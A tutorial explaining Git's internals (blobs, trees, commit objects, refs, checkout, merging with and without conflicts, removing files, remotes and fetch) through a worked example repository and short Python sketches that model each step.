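The two effects of git add can be modelled in a few lines of Python. This is a toy sketch, not Git's implementation: the objects database and the index are plain dictionaries, and git_add is a hypothetical helper. The real index is a binary file.

```python
import hashlib


def blob_id(content: bytes) -> str:
    # Header-plus-content hash that Git uses for blobs (SHA-1 format).
    header = b"blob " + str(len(content)).encode() + b"\0"
    return hashlib.sha1(header + content).hexdigest()


def git_add(objects: dict, index: dict, path: str, content: bytes) -> None:
    """Toy model of `git add`: store a blob, then point the index entry at it."""
    oid = blob_id(content)
    objects[oid] = content   # first effect: the blob is saved
    index[path] = oid        # second effect: the index entry is created or updated


objects, index = {}, {}
git_add(objects, index, "data/letter.txt", b"a")
git_add(objects, index, "data/number.txt", b"1234")
git_add(objects, index, "data/number.txt", b"1")   # the correction
```

After the third call the index still has two entries, but the objects dictionary has three blobs. The blob for 1234 is no longer referenced by the index, yet it has not been deleted.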

    Make a commit

    ~/alpha $ git commit -m 'a1'
              [master (root-commit) c388d51] a1
    

    The user makes the a1 commit. Git prints some data about the commit. These data will make sense shortly.

    The commit command has three steps. It creates a tree graph to represent the content of the version of the project being committed. It creates a commit object. It points the current branch at the new commit object.

    Create a tree graph

    Git records the current state of the project by creating a tree graph from the index. This tree graph records the location and content of every file in the project.

    The graph is composed of two types of object: blobs and trees.

    Blobs are stored by git add. They represent the content of files.

    Trees are stored when a commit is made. A tree represents a directory in the working copy.

    Below is the tree object that records the contents of the data directory for the new commit:

    100664 blob 5e40c0877058c504203932e5136051cf3cd3519b letter.txt
    100664 blob 274c0052dd5408f8ae2bc8440029ff67d79bc5c3 number.txt
    

    The first line records everything required to reproduce data/letter.txt. The first part states the file’s permissions. The second part states that the content of this entry is represented by a blob, rather than a tree. The third part states the hash of the blob. The fourth part states the file’s name.

    The second line records the same for data/number.txt.

    Below is the tree object for alpha, the root directory of the project:

    040000 tree 0eed1217a2947f4930583229987d90fe5e8e0b74 data
    

    The sole line in this tree points at the data tree.

    Tree graph for the a1 commit

    In the graph above, the alpha tree points at the data tree. The data tree points at the blobs for data/letter.txt and data/number.txt.
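
One way to picture how the flat index becomes a tree graph is the sketch below. It is an illustration only: build_tree is a hypothetical helper, trees are nested dictionaries rather than Git objects, and the hash strings are placeholders.

```python
def build_tree(index: dict) -> dict:
    """Turn flat index paths into nested dicts: one dict per directory."""
    root = {}
    for path, blob_hash in sorted(index.items()):
        *dirs, filename = path.split("/")
        node = root
        for name in dirs:
            # Each directory becomes a sub-tree, created on first use.
            node = node.setdefault(name, {})
        node[filename] = blob_hash
    return root


index = {
    "data/letter.txt": "hash-of-letter",   # placeholder strings, not real hashes
    "data/number.txt": "hash-of-number",
}
tree = build_tree(index)
```

Here tree has a single key, data, whose value holds the two file entries. That matches the shape of the graph: the root tree points at the data tree, which points at the blobs.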

    Create a commit object

    After creating the tree graph, git commit creates a commit object. This is just another text file in .git/objects/:

    tree ffe298c3ce8bb07326f888907996eaa48d266db4
    author Mary Rose Cook  1424798436 -0500
    committer Mary Rose Cook  1424798436 -0500
    
    a1
    

    The first line points at the tree graph. The hash is for the tree object that represents the root of the working copy. That is: the alpha directory. The last line is the commit message.

    a1 commit object pointing at its tree graph
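
The layout of a commit object is simple enough to assemble by hand. The sketch below builds the text and hashes it. The function names are made up, and the author string is a placeholder. It will not reproduce the hashes in this article, because those depend on the exact author details and timestamps used.

```python
import hashlib


def commit_text(tree, parents, author, timestamp, tz, message):
    """Assemble the text of a commit object in the layout shown above."""
    lines = [f"tree {tree}"]
    lines += [f"parent {p}" for p in parents]   # none for a root commit
    lines.append(f"author {author} {timestamp} {tz}")
    lines.append(f"committer {author} {timestamp} {tz}")
    return "\n".join(lines) + "\n\n" + message + "\n"


def commit_id(text: str) -> str:
    """Hash the commit text the way Git hashes objects: header plus body."""
    body = text.encode()
    header = b"commit " + str(len(body)).encode() + b"\0"
    return hashlib.sha1(header + body).hexdigest()


# "A U Thor <author@example.com>" is a placeholder identity.
text = commit_text(
    "ffe298c3ce8bb07326f888907996eaa48d266db4", [],
    "A U Thor <author@example.com>", 1424798436, "-0500", "a1",
)
```

Passing a non-empty parents list adds one parent line per entry, which is all that distinguishes a later commit or a merge commit from the first one.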

    Point the current branch at the new commit

    Finally, the commit command points the current branch at the new commit object.

    Which is the current branch? To find out, Git goes to the HEAD file at .git/HEAD and finds the line ref: refs/heads/master.

    This says that HEAD is pointing at master. master is the current branch.

    HEAD and master are both refs. A ref is a label used by Git or the user to identify a specific commit.

    The file that represents the master ref does not exist, because this is the first commit to the repository. Git creates the file at .git/refs/heads/master and sets its content to the hash of the commit object:

    a87cc0f39d12e51be8d68eab5cef1d31e8807a1c
    

    Let’s add HEAD and master to the Git graph:

    HEAD pointing at master and master pointing at the a1 commit

    HEAD points at master, as it did before the commit. But master now exists and points at the new commit object.
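
Following HEAD to a commit can be sketched as two file reads. This is a simplified model: resolve_head is a hypothetical helper, and it only looks at loose ref files like the ones described here. It builds a throwaway directory so that it can run anywhere.

```python
from pathlib import Path
import tempfile


def resolve_head(git_dir: Path) -> str:
    """Follow HEAD to a commit hash (loose ref files only)."""
    head = (git_dir / "HEAD").read_text().strip()
    if head.startswith("ref: "):
        # Symbolic ref: HEAD names a branch file that holds the hash.
        return (git_dir / head[len("ref: "):]).read_text().strip()
    # Otherwise HEAD holds a hash directly.
    return head


# Build a throwaway directory that mimics the layout described above.
git_dir = Path(tempfile.mkdtemp()) / ".git"
(git_dir / "refs" / "heads").mkdir(parents=True)
(git_dir / "HEAD").write_text("ref: refs/heads/master\n")
(git_dir / "refs" / "heads" / "master").write_text(
    "a87cc0f39d12e51be8d68eab5cef1d31e8807a1c\n"
)
```

Calling resolve_head(git_dir) returns the hash stored in the master file. Making a new commit on master only has to rewrite that one file. HEAD itself stays the same.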

    Make a commit that is not the first commit

    Below is the Git graph after the a1 commit. The working copy and index are included.

    a1 commit shown with the working copy and index

    Notice that the working copy, index, and a1 commit all have the same content for data/letter.txt and data/number.txt. Notice that the index and HEAD commit both use hashes to refer to blob objects, but the working copy content is stored as text in a different place.

    ~/alpha $ printf '2' > data/number.txt
    

    The user sets the content of data/number.txt to 2. This updates the working copy, but leaves the index and HEAD commit as they are.

    data/number.txt set to 2 in the working copy

    ~/alpha $ git add data/number.txt
    

    The user adds the file to Git. This adds a blob containing 2 to the objects directory. And it points the index entry for data/number.txt at the new blob.

    data/number.txt set to 2 in the working copy and index

    ~/alpha $ git commit -m 'a2'
              [master ae78f19] a2
    

    The user commits. The steps for the commit are the same as before.

    First, a new tree graph is created to represent the content of the index.

    The index entry for data/number.txt has changed. The old data tree no longer reflects the indexed state of the data directory. A new data tree object must be created:

    100664 blob 2e65efe2a145dda7ee51d1741299f848e5bf752e letter.txt
    100664 blob d8263ee9860594d2806b0dfd1bfd17528b0ba2a4 number.txt
    

    The new data tree hashes to a value that is different from the old data tree. A new alpha tree must be created to record this hash:

    040000 tree 40b0318811470aaacc577485777d7a6780e51f0b data
    

    Second, a new commit object is created.

    tree ce72afb5ff229a39f6cce47b00d1b0ed60fe3556
    parent 30ec3334aaa3954ef44fb6b68cfbf1a225c3d5af
    author Mary Rose Cook  1424813101 -0500
    committer Mary Rose Cook  1424813101 -0500
    
    a2
    

    The first line of the commit object points at the new alpha tree object. The second line points at the commit’s parent, a1. To find the parent commit, Git went to HEAD, followed it to master and found the commit hash of a1.

    Third, the content of the master branch file is set to the hash of the new commit.

    a2 commit

    Git graph without the working copy and index

    Graph property: content is stored as a tree of objects. This means that only diffs are stored in the objects database. Look at the graph above. The a2 commit reuses the a blob that was made before the a1 commit. Similarly, if a whole directory doesn’t change from commit to commit, its tree and all the blobs and trees below it can be reused. Generally, there are few content changes from commit to commit. This means that Git can store large commit histories in a small amount of space.
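
The reuse of blobs falls out of naming objects by their content. The sketch below compares the blobs needed by the a1 and a2 versions of the project. The helper snapshot_blobs is made up for this illustration, and trees are left out to keep it short.

```python
import hashlib


def blob_id(content: bytes) -> str:
    header = b"blob " + str(len(content)).encode() + b"\0"
    return hashlib.sha1(header + content).hexdigest()


def snapshot_blobs(files: dict) -> set:
    """Return the set of blob IDs needed to store one version of the project."""
    return {blob_id(content) for content in files.values()}


a1 = {"data/letter.txt": b"a", "data/number.txt": b"1"}
a2 = {"data/letter.txt": b"a", "data/number.txt": b"2"}

shared = snapshot_blobs(a1) & snapshot_blobs(a2)      # blobs a2 can reuse
new_in_a2 = snapshot_blobs(a2) - snapshot_blobs(a1)   # blobs a2 had to add
```

Only one new blob is needed for a2. The blob for data/letter.txt is shared, because the same content always hashes to the same name.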

    Graph property: each commit, apart from the first, has a parent. This means that a repository can store the history of a project.

    Graph property: refs are entry points to one part of the commit history or another. This means that commits can be given meaningful names. The user organizes their work into lineages that are meaningful to their project with concrete refs like fix-for-bug-376. Git uses symbolic refs like HEAD, MERGE_HEAD and FETCH_HEAD to support commands that manipulate the commit history.

    Graph property: the nodes in the objects/ directory are immutable. This means that content is edited, not deleted. Every piece of content ever added and every commit ever made is somewhere in the objects directory.

    Graph property: refs are mutable. Therefore, the meaning of a ref can change. The commit that master points at might be the best version of a project at the moment, but, soon enough, it will be superseded by a newer and better commit.

    Graph property: the working copy and the commits pointed at by refs are readily available, but other commits are not. This means that recent history is easier to recall, but that it also changes more often. Or: Git has a fading memory that must be jogged with increasingly vicious prods.

    The working copy is the easiest point in history to recall because it is in the root of the repository. Recalling it doesn’t even require a Git command. It is also the least permanent point in history. The user can make a dozen versions of a file, but, unless they are added, Git won’t record any of them.

    The commit that HEAD points at is very easy to recall. It is at the tip of the branch that is checked out. To see its content, the user can just stash and then examine the working copy. At the same time, HEAD is the most frequently changing ref.

    The commit that a concrete ref points at is easy to recall. The user can simply check out that branch. The tip of a branch changes less often than HEAD, but still often enough for the meaning of a branch name to be changeable.

    It is difficult to recall a commit that is not pointed at by any ref. And, the further the user goes from a ref, the harder it will be for them to construct the meaning of a commit. But, the further back they go, the less likely it is that someone will have changed history since they last looked.

    Check out a commit

    ~/alpha $ git checkout 37888c2
              You are in 'detached HEAD' state...
    

    The user checks out the a2 commit using its hash. (If you are running these Git commands, this one won’t work. Use git log to find the hash of your a2 commit.)

    Checking out has four steps.

    First, Git gets the a2 commit and gets the tree graph it points at.

    Second, it writes the file entries in the tree graph to the working copy. This results in no changes. Because HEAD was already pointing (via master) at the a2 commit, the working copy already has the content of the tree graph being written to it.

    Third, Git writes the file entries in the tree graph to the index. This, too, results in no changes. The index already has the content of the a2 commit.

    Fourth, the content of HEAD is set to the hash of the a2 commit:

    37888c274ecb894b656829d55e88cd086c9b2f72
    

    Setting the content of HEAD to a hash puts the repository in the detached HEAD state. Notice in the graph below that HEAD, rather than pointing at master, points directly at the a2 commit.

    Detached HEAD on a2 commit

    ~/alpha $ printf '3' > data/number.txt
    ~/alpha $ git add data/number.txt
    ~/alpha $ git commit -m 'a3'
              [detached HEAD 05f9ae6] a3
    

    The user sets the content of data/number.txt to 3 and commits the change. To get the parent of the a3 commit, Git goes to HEAD. Instead of finding and following a branch ref, it finds and returns the hash of the a2 commit.

    Git updates HEAD to point directly at the hash of the new a3 commit. The repository is still in the detached HEAD state. Because no branch points at either a3 or one of its descendants, it is not on a branch. This means it is easy to lose.

    Note that, from now on, trees and blobs will mostly be omitted from the graph diagrams.

    a3 commit that is not on a branch

    Create a branch

    ~/alpha $ git branch deputy
    

    The user creates a new branch called deputy. This just creates a new file at .git/refs/heads/deputy that contains the hash that HEAD is pointing at. That is, the hash of the a3 commit.

    Graph property: branches are just refs and refs are just files. This means that Git branches are lightweight.
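
To show how little a branch is, here is a sketch that creates one by writing a single file. create_branch is a hypothetical stand-in for git branch, the directory is a temporary one, and the hash is a placeholder.

```python
from pathlib import Path
import tempfile


def create_branch(git_dir: Path, name: str, commit_hash: str) -> Path:
    """Toy `git branch`: write one small file holding the commit hash."""
    ref = git_dir / "refs" / "heads" / name
    ref.parent.mkdir(parents=True, exist_ok=True)
    ref.write_text(commit_hash + "\n")
    return ref


git_dir = Path(tempfile.mkdtemp()) / ".git"
# Placeholder hash for the a3 commit; the real value depends on the repository.
a3 = "3" * 40
ref = create_branch(git_dir, "deputy", a3)
```

The whole branch is a file of about forty characters. No objects are copied and no history is rewritten.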

    The creation of the deputy branch puts the new a3 commit safely on a branch. HEAD is still detached because it still points directly at a commit.

    a3 commit now on the deputy branch

    Check out a branch

    ~/alpha $ git checkout master
              Switched to branch 'master'
    

    The user checks out the master branch.

    First, Git gets the a2 commit that master points at and gets the tree graph the commit points at.

    Second, Git writes the file entries in the tree graph to the files of the working copy. This sets the content of data/number.txt to 2.

    Third, Git writes the file entries in the tree graph to the index. This updates the entry for data/number.txt to the hash of the 2 blob.

    Fourth, Git points HEAD at master by changing its content from a hash to ref: refs/heads/master.

    master checked out and pointing at the a2 commit

    Check out a branch that is incompatible with the working copy

    ~/alpha $ printf '789' > data/number.txt
    ~/alpha $ git checkout deputy
              Your changes to these files would be overwritten
              by checkout:
                data/number.txt
              Commit your changes or stash them before you
              switch branches.
    

    The user accidentally sets the content of data/number.txt to 789. They try to check out deputy. Git prevents the check out.

    HEAD points at master which points at a2 where data/number.txt reads 2. deputy points at a3 where data/number.txt reads 3. The working copy version of data/number.txt reads 789. All these versions are different and the differences must be resolved.

    Git could replace the working copy version of data/number.txt with the version in the commit being checked out. But it avoids data loss at all costs.

    Git could merge the working copy version with the version being checked out. But this is complicated.

    So, Git aborts the check out.
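
The decision to abort can be sketched as a comparison of three versions of each file. This is a simplification of what Git checks: blocked_paths is a hypothetical helper, it ignores the index, and it ignores files that exist on only one side.

```python
def blocked_paths(head: dict, target: dict, working: dict) -> list:
    """List files whose uncommitted edits a checkout would overwrite.

    Each argument maps a path to that version's file content.
    """
    blocked = []
    for path in sorted(set(head) & set(target) & set(working)):
        edited_locally = working[path] != head[path]
        changed_by_checkout = target[path] != head[path]
        if edited_locally and changed_by_checkout:
            blocked.append(path)
    return blocked


head = {"data/letter.txt": "a", "data/number.txt": "2"}      # master, a2
target = {"data/letter.txt": "a", "data/number.txt": "3"}    # deputy, a3
```

With a working copy where data/number.txt reads 789, the function reports that file as blocked. Once the content is set back to 2, the list is empty and the checkout can go ahead.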

    ~/alpha $ printf '2' > data/number.txt
    ~/alpha $ git checkout deputy
              Switched to branch 'deputy'
    

    The user notices that they accidentally edited data/number.txt and sets the content back to 2. They check out deputy successfully.

    deputy checked out

    Merge an ancestor

    ~/alpha $ git merge master
              Already up-to-date.
    

    The user merges master into deputy. Merging two branches means merging two commits. The first commit is the one that deputy points at: the receiver. The second commit is the one that master points at: the giver. For this merge, Git does nothing. It reports that it is Already up-to-date.

    Graph property: the series of commits in the graph are interpreted as a series of changes made to the content of the repository. This means that, in a merge, if the giver commit is an ancestor of the receiver commit, Git will do nothing. Those changes have already been incorporated.

    Merge a descendant

    ~/alpha $ git checkout master
              Switched to branch 'master'
    

    The user checks out master.

    master checked out and pointing at the a2 commit

    ~/alpha $ git merge deputy
              Fast-forward
    

    They merge deputy into master. Git discovers that the receiver commit, a2, is an ancestor of the giver commit, a3. This means it can do a fast-forward merge.

    It gets the giver commit and gets the tree graph that it points at. It writes the file entries in the tree graph to the working copy and the index. It “fast-forwards” master to point at a3.

    a3 commit from deputy fast-forward merged into master

    Graph property: the series of commits in the graph are interpreted as a series of changes made to the content of the repository. This means that, in a merge, if the giver is a descendant of the receiver, history is not changed. There is already a sequence of commits that describe the change to make: the sequence of commits between the receiver and the giver. But, though the Git history doesn’t change, the Git graph does change. The concrete ref that HEAD points at is updated to point at the giver commit.
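
The choice between doing nothing, fast-forwarding and making a merge commit depends only on ancestry. Here is a small sketch of that decision. The commit graph is a dictionary from each commit to its parents, keyed by commit message rather than hash, and both function names are made up.

```python
def ancestors(parents: dict, commit: str) -> set:
    """Return every commit reachable from `commit` by following parent links."""
    seen, stack = set(), list(parents.get(commit, []))
    while stack:
        current = stack.pop()
        if current not in seen:
            seen.add(current)
            stack.extend(parents.get(current, []))
    return seen


def merge_kind(parents: dict, receiver: str, giver: str) -> str:
    if giver == receiver or giver in ancestors(parents, receiver):
        return "already up-to-date"   # the giver's changes are already included
    if receiver in ancestors(parents, giver):
        return "fast-forward"         # just move the branch ref to the giver
    return "merge commit"             # the commits are in different lineages


# Parent links for the commits made so far, keyed by commit message.
parents = {"a1": [], "a2": ["a1"], "a3": ["a2"]}
```

With this graph, merging a2 into a3 is already up to date, and merging a3 into a2 is a fast-forward.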

    Merge two commits from different lineages

    ~/alpha $ printf '4' > data/number.txt
    ~/alpha $ git add data/number.txt
    ~/alpha $ git commit -m 'a4'
              [master c6b955e] a4
    

    The user sets the content of number.txt to 4 and commits the change to master.

    ~/alpha $ git checkout deputy
              Switched to branch 'deputy'
    ~/alpha $ printf 'b' > data/letter.txt
    ~/alpha $ git add data/letter.txt
    ~/alpha $ git commit -m 'b3'
              [deputy d75b998] b3
    

    The user checks out deputy. They set the content of data/letter.txt to b and commit the change to deputy.

    a4 committed to master, b3 committed to deputy and deputy checked out

    Graph property: commits can share parents. This means that new lineages can be created in the commit history.

    Graph property: commits can have multiple parents. This means that separate lineages can be joined by a commit with two parents: a merge commit.

    ~/alpha $ git merge master -m 'b4'
              Merge made by the 'recursive' strategy.
    

    The user merges master into deputy.

    Git discovers that the receiver, b3, and the giver, a4, are in different lineages. It makes a merge commit. This process has eight steps.

    First, Git writes the hash of the giver commit to a file at alpha/.git/MERGE_HEAD. The presence of this file tells Git it is in the middle of merging.

    Second, Git finds the base commit: the most recent ancestor that the receiver and giver commits have in common.

    a3, the base commit of a4 and b3

    Graph property: commits have parents. This means that it is possible to find the point at which two lineages diverged. Git traces backwards from b3 to find all its ancestors and backwards from a4 to find all its ancestors. It finds the most recent ancestor shared by both lineages, a3. This is the base commit.
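
The search for the base commit can be sketched as two walks over the parent links. This is a simplified version for straightforward histories like this one, not Git's actual merge-base algorithm. The graph is keyed by commit message, and the function names are hypothetical.

```python
from collections import deque


def ancestors(parents: dict, commit: str) -> set:
    """Return `commit` and every commit reachable through parent links."""
    seen, queue = {commit}, deque([commit])
    while queue:
        for parent in parents.get(queue.popleft(), []):
            if parent not in seen:
                seen.add(parent)
                queue.append(parent)
    return seen


def base_commit(parents: dict, receiver: str, giver: str):
    """Walk back from the giver, nearest commits first, until the lineages meet."""
    receiver_side = ancestors(parents, receiver)
    seen, queue = {giver}, deque([giver])
    while queue:
        commit = queue.popleft()
        if commit in receiver_side:
            return commit
        for parent in parents.get(commit, []):
            if parent not in seen:
                seen.add(parent)
                queue.append(parent)
    return None  # the two commits share no history


parents = {"a1": [], "a2": ["a1"], "a3": ["a2"], "a4": ["a3"], "b3": ["a3"]}
```

For the receiver b3 and the giver a4, the walk from a4 reaches a3 first, and a3 is also an ancestor of b3. So a3 is the base.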

    Third, Git generates the indices for the base, receiver and giver commits from their tree graphs.

    Fourth, Git generates a diff that contains the changes required to go from the content of the receiver commit to the content of the giver commit. This diff is a list of file paths that point to a change: add, remove, modify or conflict.

    Git gets the list of all the files that appear in the base, receiver or giver indices. For each one, it compares the index entries to find the change that was made to the file. It writes a corresponding entry to the diff. In this case, the diff has two entries.

    The first entry is for data/letter.txt. The content of this file is a in the base, b in the receiver and a in the giver. The content is different in the base and receiver. But it is the same in the base and giver. Git sees that the content was modified by the receiver but not the giver. The diff entry for data/letter.txt is a modification, not a conflict.

    The second entry in the diff is for data/number.txt. In this case, the content is the same in the base and receiver, and different in the giver. The diff entry for data/number.txt is also a modification.

    Graph property: it is possible to find the base commit of a merge. This means that, if a file has changed from the base in just the receiver or giver, Git can automatically resolve the merge of that file. This reduces the work the user must do.
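
The per-file comparison against the base can be written as a short function. This is a sketch of the idea for whole-file content only. merge_file is a made-up name, and real merges also work line by line within a file.

```python
def merge_file(base, receiver, giver):
    """Three-way comparison of one file's content.

    Returns (status, content), where status is "unchanged", "modify"
    or "conflict", and content is the merged result if there is one.
    """
    if receiver == giver:
        status = "unchanged" if receiver == base else "modify"
        return status, receiver
    if giver == base:
        return "modify", receiver   # only the receiver changed the file
    if receiver == base:
        return "modify", giver      # only the giver changed the file
    return "conflict", None         # both sides changed it, in different ways
```

For data/letter.txt the inputs are a, b and a, so the result keeps b. For data/number.txt the inputs are 3, 3 and 4, so the result takes 4. Neither needs the user's help.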

    Fifth, the changes indicated by the entries in the diff are applied to the working copy. The content of data/letter.txt is set to b and the content of data/number.txt is set to 4.

    Sixth, the changes indicated by the entries in the diff are applied to the index. The entry for data/letter.txt is pointed at the b blob and the entry for data/number.txt is pointed at the 4 blob.

    Seventh, the updated index is committed:

    tree 20294508aea3fb6f05fcc49adaecc2e6d60f7e7d
    parent d75b9983183df12a8e745318d0c31cc1782eaf2f
    parent c6b955e6d3d26248112b29176d47b4186a9a20c8
    author Mary Rose Cook  1425596551 -0500
    committer Mary Rose Cook  1425596551 -0500
    
    b4
    

    Notice that the commit has two parents.

    Eighth, Git points the current branch, deputy, at the new commit.

    b4, the merge commit resulting from the recursive merge of a4 into b3

    Merge two commits from different lineages that both modify the same file

    Before going further, the user checks out master and merges deputy into it. Because the a4 commit that master points at is an ancestor of b4, this is a fast-forward merge, and master and deputy now both point at b4. The user then checks out deputy again.

    ~/alpha $ printf '5' > data/number.txt
    ~/alpha $ git add data/number.txt
    ~/alpha $ git commit -m 'b5'
              [deputy 15b9e42] b5
    

    The user sets the content of data/number.txt to 5 and commits the change to deputy.

    ~/alpha $ git checkout master
              Switched to branch 'master'
    ~/alpha $ printf '6' > data/number.txt
    ~/alpha $ git add data/number.txt
    ~/alpha $ git commit -m 'b6'
              [master 6deded9] b6
    

    The user checks out master. They set the content of data/number.txt to 6 and commit the change to master.

    b6 commit on master

    ~/alpha $ git merge deputy
              CONFLICT in data/number.txt
              Automatic merge failed; fix conflicts and
              commit the result.
    

    The user merges deputy into master. There is a conflict and the merge is paused. The process for a conflicted merge follows the same first six steps as the process for an unconflicted merge: set .git/MERGE_HEAD, find the base commit, generate the indices of the base, receiver and giver commits, create a diff, update the working copy and update the index. Because of the conflict, the seventh commit step and eighth ref update step are never taken. Let’s go through the steps again and see what happens.

    First, Git writes the hash of the giver commit to a file at .git/MERGE_HEAD.

    MERGE_HEAD written during merge of b5 into b6

    Second, Git finds the base commit, b4.

    Third, Git generates the indices for the base, receiver and giver commits.

    Fourth, Git creates a diff that contains the changes required to go from the receiver commit to the giver commit. In this case, the diff contains only one entry: data/number.txt. Because the content for data/number.txt is different in the receiver, giver and base, the entry is marked as a conflict.

    Fifth, the changes indicated by the entries in the diff are applied to the working copy. For a conflicted area, Git writes both versions to the file in the working copy. The content of data/number.txt is set to:

    <<<<<<< HEAD
    6
    =======
    5
    >>>>>>> deputy
    

    Sixth, the changes indicated by the entries in the diff are applied to the index. Entries in the index are uniquely identified by a combination of their file path and stage. The entry for an unconflicted file has a stage of 0. Before this merge, the index looked like this, where the 0s are stage values:

    0 data/letter.txt 63d8dbd40c23542e740659a7168a0ce3138ea748
    0 data/number.txt 62f9457511f879886bb7728c986fe10b0ece6bcb
    

    After the merge diff is written to the index, the index looks like this:

    0 data/letter.txt 63d8dbd40c23542e740659a7168a0ce3138ea748
    1 data/number.txt bf0d87ab1b2b0ec1a11a3973d2845b42413d9767
    2 data/number.txt 62f9457511f879886bb7728c986fe10b0ece6bcb
    3 data/number.txt 7813681f5b41c028345ca62a2be376bae70b7f61
    

    The entry for data/letter.txt at stage 0 is the same as it was before the merge. The entry for data/number.txt at stage 0 is gone. There are three new entries in its place. The entry for stage 1 has the hash of the base data/number.txt content. The entry for stage 2 has the hash of the receiver data/number.txt content. The entry for stage 3 has the hash of the giver data/number.txt content. The presence of these three entries tells Git that data/number.txt is in conflict.

    The merge pauses.
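
The staged entries can be modelled as a dictionary keyed by path and stage. The sketch below is a toy, not the real index format. The helper names are made up, and the hashes are the ones from the listings above.

```python
def mark_conflict(index: dict, path: str, base: str, receiver: str, giver: str) -> None:
    """Replace the stage-0 entry for `path` with stages 1, 2 and 3."""
    index.pop((path, 0), None)
    index[(path, 1)] = base
    index[(path, 2)] = receiver
    index[(path, 3)] = giver


def conflicted_paths(index: dict) -> set:
    """A path is in conflict if it has any entry at a stage other than 0."""
    return {path for (path, stage) in index if stage != 0}


def resolve(index: dict, path: str, new_hash: str) -> None:
    """Model of adding a conflicted file: drop stages 1-3, write stage 0."""
    for stage in (1, 2, 3):
        index.pop((path, stage), None)
    index[(path, 0)] = new_hash


# Keys are (path, stage); values are blob hashes.
index = {
    ("data/letter.txt", 0): "63d8dbd40c23542e740659a7168a0ce3138ea748",
    ("data/number.txt", 0): "62f9457511f879886bb7728c986fe10b0ece6bcb",
}
mark_conflict(
    index,
    "data/number.txt",
    base="bf0d87ab1b2b0ec1a11a3973d2845b42413d9767",
    receiver="62f9457511f879886bb7728c986fe10b0ece6bcb",
    giver="7813681f5b41c028345ca62a2be376bae70b7f61",
)
```

While conflicted_paths(index) is non-empty, the merge cannot be committed. Calling resolve with the hash of a new blob puts the path back at stage 0.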

    ~/alpha $ printf '13' > data/number.txt
    ~/alpha $ git add data/number.txt
    

    The user integrates the content of the two conflicting versions by setting the content of data/number.txt to 13. They add the file to the index. Git adds a blob containing 13. Adding a conflicted file tells Git that the conflict is resolved. Git removes the data/number.txt entries for stages 1, 2 and 3 from the index. It adds an entry for data/number.txt at stage 0 with the hash of the new blob. The index now reads:

    0 data/letter.txt 63d8dbd40c23542e740659a7168a0ce3138ea748
    0 data/number.txt ca7bf83ac53a27a2a914bed25e1a07478dd8ef47
    
    ~/alpha $ git commit -m 'b13'
              [master 28118a0] b13
    

    Seventh, the user commits. Git sees .git/MERGE_HEAD in the repository, which tells it that a merge is in progress. It checks the index and finds there are no conflicts. It creates a new commit, b13, to record the content of the resolved merge. It deletes the file at .git/MERGE_HEAD. This completes the merge.

    Eighth, Git points the current branch, master, at the new commit.

    b13, the merge commit resulting from the conflicted, recursive merge of b5 into b6

    Remove a file

    A diagram of the Git graph that includes the commit history, the trees and blobs for the latest commit, and the working copy and index:

    The working copy, index, b13 commit and its tree graph

    ~/alpha $ git rm data/letter.txt
              rm 'data/letter.txt'
    

    The user tells Git to remove data/letter.txt. The file is deleted from the working copy. The entry is deleted from the index.

    After data/letter.txt rmed from working copy and index

    ~/alpha $ git commit -m '13'
              [master 836b25c] 13
    

    The user commits. As part of the commit, as always, Git builds a tree graph that represents the content of the index. Because data/letter.txt is not in the index, it is not included in the tree graph.

    13 commit made after data/letter.txt rmed

    Copy a repository

    ~/alpha $ cd ..
          ~ $ cp -r alpha bravo
    

    The user copies the contents of the alpha/ repository to the bravo/ directory. This produces the following directory structure:

    ~
    ├── alpha
    |   └── data
    |       └── number.txt
    └── bravo
        └── data
            └── number.txt
    

    There is now another Git graph in the bravo directory:

    New graph created when alpha cped to bravo

    Link a repository to another repository

          ~ $ cd alpha
    ~/alpha $ git remote add bravo ../bravo
    

    The user moves back into the alpha repository. They set up bravo as a remote repository on alpha. This adds some lines to the file at alpha/.git/config:

    [remote "bravo"]
        url = ../bravo/
    

    These lines specify that there is a remote repository called bravo in the directory at ../bravo.

    Fetch a branch from a remote

    ~/alpha $ cd ../bravo
    ~/bravo $ printf '14' > data/number.txt
    ~/bravo $ git add data/number.txt
    ~/bravo $ git commit -m '14'
              [master 6764cd8] 14
    

    The user goes into the bravo repository. They set the content of data/number.txt to 14 and commit the change to master on bravo.

    14 commit on bravo repository

    ~/bravo $ cd ../alpha
    ~/alpha $ git fetch bravo master
              Unpacking objects: 100%
              From ../bravo
                * branch master -> FETCH_HEAD
    

    The user goes into the alpha repository. They fetch master from bravo into alpha. This process has four steps.

    First, Git gets the hash of the commit that master is pointing at on bravo. This is the hash of the 14 commit.

    Second, Git makes a list of all the objects that the 14 commit depends on: the commit object itself, the objects in its tree graph, the ancestor commits of the 14 commit and the objects in their tree graphs. It removes from this list any objects that the alpha object database already has. It copies the rest to alpha/.git/objects/.

    Third, the content of the concrete ref file at alpha/.git/refs/remotes/bravo/master is set to the hash of the 14 commit.

    Fourth, the content of alpha/.git/FETCH_HEAD is set to:

    132c6a5ba1bb9e0d89c45dc50ba4553f5edd19dc branch 'master' of ../bravo
    

    This indicates that the most recent fetch command fetched the 14 commit of master from bravo.
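
The four steps of a fetch can be sketched with dictionaries standing in for the two object databases. Everything here is a model: the object IDs are short labels rather than hashes, fetch and reachable are hypothetical helpers, and the real FETCH_HEAD file holds more than the bare hash.

```python
def reachable(objects: dict, start: str) -> set:
    """Collect `start` and everything it refers to, directly or indirectly.

    `objects` maps an object ID to the list of IDs it points at
    (a commit's tree and parents, a tree's blobs and sub-trees).
    """
    seen, stack = set(), [start]
    while stack:
        oid = stack.pop()
        if oid not in seen:
            seen.add(oid)
            stack.extend(objects[oid])
    return seen


def fetch(remote: dict, local: dict, local_refs: dict,
          remote_name: str, branch: str, tip: str) -> set:
    """Toy fetch: copy missing objects, then record the remote branch and FETCH_HEAD."""
    missing = reachable(remote, tip) - set(local)
    for oid in missing:
        local[oid] = remote[oid]
    local_refs[f"refs/remotes/{remote_name}/{branch}"] = tip
    local_refs["FETCH_HEAD"] = tip
    return missing


# Short labels stand in for real hashes.
alpha = {"c13": ["t13"], "t13": ["blob13"], "blob13": []}
bravo = dict(alpha, c14=["t14", "c13"], t14=["blob14"], blob14=[])
refs = {}
copied = fetch(bravo, alpha, refs, "bravo", "master", "c14")
```

Only the objects that alpha lacks are copied: the 14 commit, its tree and its new blob. The 13 commit and everything below it are already present.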

    alpha after bravo/master fetched

    Graph property: objects can be copied. This means that history can be shared between repositories.

    Graph property: a repository can store remote branch refs like alpha/.git/refs/remotes/bravo/master. This means that a repository can record locally the state of a branch on a remote repository. Though correct at the time it is fetched, it will go out of date if the remote branch changes.

    Merge FETCH_HEAD

    ~/alpha $ git merge FETCH_HEAD
              Updating 836b25c..6764cd8
              Fast-forward
    

